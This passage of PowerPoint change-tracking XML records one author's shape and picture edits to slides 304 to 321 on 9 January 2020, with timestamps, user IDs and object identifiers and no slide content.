          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:48:02.227" v="9514" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3669925696" sldId="304"/>
            <ac:spMk id="19" creationId="{F2291C29-2100-3945-B1DD-7B18A793AC1D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:48:02.227" v="9514" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3669925696" sldId="304"/>
            <ac:picMk id="15" creationId="{8372ACA6-C7AC-364C-B7C5-E357DE618D94}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:48:02.227" v="9514" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3669925696" sldId="304"/>
            <ac:picMk id="17" creationId="{5B4A181C-61C1-6D46-A03A-6C815265D9F6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:48:02.227" v="9514" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3669925696" sldId="304"/>
            <ac:picMk id="20" creationId="{0F1CB2AF-E6D1-D542-9A8B-EDEFA44293B6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:54:46.522" v="9629" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3174591640" sldId="305"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:54:46.522" v="9629" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3174591640" sldId="305"/>
            <ac:spMk id="3" creationId="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:52.336" v="11393"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2904144640" sldId="306"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:52.137" v="11392" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2904144640" sldId="306"/>
            <ac:spMk id="4" creationId="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:47.212" v="11391"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2904144640" sldId="306"/>
            <ac:spMk id="11" creationId="{91CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:58:50.243" v="9764" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2904144640" sldId="306"/>
            <ac:spMk id="12" creationId="{E9ABC3FD-A554-FC40-959B-6C9A614673FD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:51:52.336" v="11393"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2904144640" sldId="306"/>
            <ac:spMk id="13" creationId="{F7074B64-8AEF-A749-93EB-7CC37FE30E21}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:59:35.137" v="9781" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3068728442" sldId="307"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:59:35.137" v="9781" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068728442" sldId="307"/>
            <ac:spMk id="4" creationId="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:59:25.512" v="9776" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068728442" sldId="307"/>
            <ac:spMk id="11" creationId="{91CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T17:59:28.235" v="9778" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3068728442" sldId="307"/>
            <ac:spMk id="12" creationId="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:55.171" v="9881" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3054085721" sldId="308"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:55.171" v="9881" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3054085721" sldId="308"/>
            <ac:spMk id="13" creationId="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:48.878" v="9879" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4150008810" sldId="309"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:48.878" v="9879" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4150008810" sldId="309"/>
            <ac:spMk id="13" creationId="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:19:31.704" v="9826" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4150008810" sldId="309"/>
            <ac:spMk id="14" creationId="{40999803-52FE-F74F-89FE-53548837A52D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:19:45.285" v="9831" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4150008810" sldId="309"/>
            <ac:spMk id="15" creationId="{26A25A58-FC60-BE41-8C32-D41F85AC4E9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:19:49.794" v="9833" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4150008810" sldId="309"/>
            <ac:spMk id="16" creationId="{03F433BD-52DF-9C4D-83AF-ED66318D5F4B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:41.139" v="9872" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1090619632" sldId="310"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:41.139" v="9872" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1090619632" sldId="310"/>
            <ac:spMk id="13" creationId="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:21:23.913" v="9871" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1090619632" sldId="310"/>
            <ac:spMk id="16" creationId="{F53BF576-6E68-B145-AA0D-F661101BAB58}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add modNotesTx">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:28:46.026" v="10702" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3365274882" sldId="311"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:24:32.941" v="10214" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="3" creationId="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:46.445" v="9886" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="4" creationId="{7952D09D-271F-7D43-90E2-3888E406EBD9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="11" creationId="{91CC8A35-9479-B849-B45E-FABD9E1A836E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="12" creationId="{CD49ADFF-63AC-B147-B56A-7E009F8EE8B4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="13" creationId="{85719D82-0549-2141-8682-2AA4B16E1A2E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="14" creationId="{40999803-52FE-F74F-89FE-53548837A52D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="15" creationId="{26A25A58-FC60-BE41-8C32-D41F85AC4E9C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:22:45.825" v="9885" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3365274882" sldId="311"/>
            <ac:spMk id="16" creationId="{F53BF576-6E68-B145-AA0D-F661101BAB58}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:25:41.240" v="10318" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1212702315" sldId="312"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:25:41.240" v="10318" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1212702315" sldId="312"/>
            <ac:spMk id="3" creationId="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:26:10.304" v="10436" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3267600343" sldId="313"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:26:10.304" v="10436" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3267600343" sldId="313"/>
            <ac:spMk id="3" creationId="{EC9BA853-A72E-1144-BB73-652798A4A83D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del ord">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T20:24:29.691" v="15186" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2025127293" sldId="314"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:46:56.617" v="11019" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="15215161" sldId="315"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:43:37.288" v="10863" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:spMk id="2" creationId="{FA7CCCB0-0F31-8347-A5B7-5DC897336EC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:46:54.876" v="11018" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:43:49.552" v="10870" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:spMk id="16" creationId="{204C423C-91B8-7946-B03C-9F80DD50A17B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:43:48.640" v="10869" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:spMk id="20" creationId="{C242F640-1B0A-8C4E-95E1-E884D197C364}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:46:56.617" v="11019" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:picMk id="3" creationId="{7FCD9B37-5B30-7442-8A95-923A3C134B23}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:43:47.459" v="10868" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="15215161" sldId="315"/>
            <ac:picMk id="15" creationId="{A7FDD8D0-DA89-8744-8211-1AA9DBE082FA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:45:55.264" v="10959" actId="242"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3327479853" sldId="316"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:45:55.264" v="10959" actId="242"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3327479853" sldId="316"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:46:44.098" v="11015" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1304037840" sldId="317"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:46:44.098" v="11015" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1304037840" sldId="317"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:48:02.654" v="11246" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3444163047" sldId="318"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:48:02.654" v="11246" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3444163047" sldId="318"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:48:48.345" v="11323" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4033538722" sldId="319"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:48:48.345" v="11323" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4033538722" sldId="319"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:49:39.521" v="11381" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="600782577" sldId="320"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:49:39.521" v="11381" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="600782577" sldId="320"/>
            <ac:spMk id="14" creationId="{2CDEEE0D-0C43-6745-85E5-F6BE7154AC0E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:49:00.853" v="11336" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="600782577" sldId="320"/>
            <ac:picMk id="3" creationId="{7FCD9B37-5B30-7442-8A95-923A3C134B23}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:49:30.271" v="11339" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="600782577" sldId="320"/>
            <ac:picMk id="4" creationId="{2A94EBE0-7C57-6B40-9898-DFBD095A276D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add">
        <pc:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:05:57.958" v="11830" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4079346635" sldId="321"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T19:03:01.397" v="11412" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="2" creationId="{FA7CCCB0-0F31-8347-A5B7-5DC897336EC1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:53:15.569" v="11395" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="7" creationId="{4138A7CB-BEC5-0B4C-8DC7-18565A672D76}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Anthony Pipia" userId="f3c8dc5a-5bc9-4640-a811-944099d514c1" providerId="ADAL" clId="{627037FB-9217-C847-BAEC-767188B47FC9}" dt="2020-01-09T18:53:23.667" v="11398" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4079346635" sldId="321"/>
            <ac:spMk id="8" creationId="{067C673F-546E-7245-8AA1-267F6B17654F}"/>
          </ac:spMkLst>
        </pc:spChg>
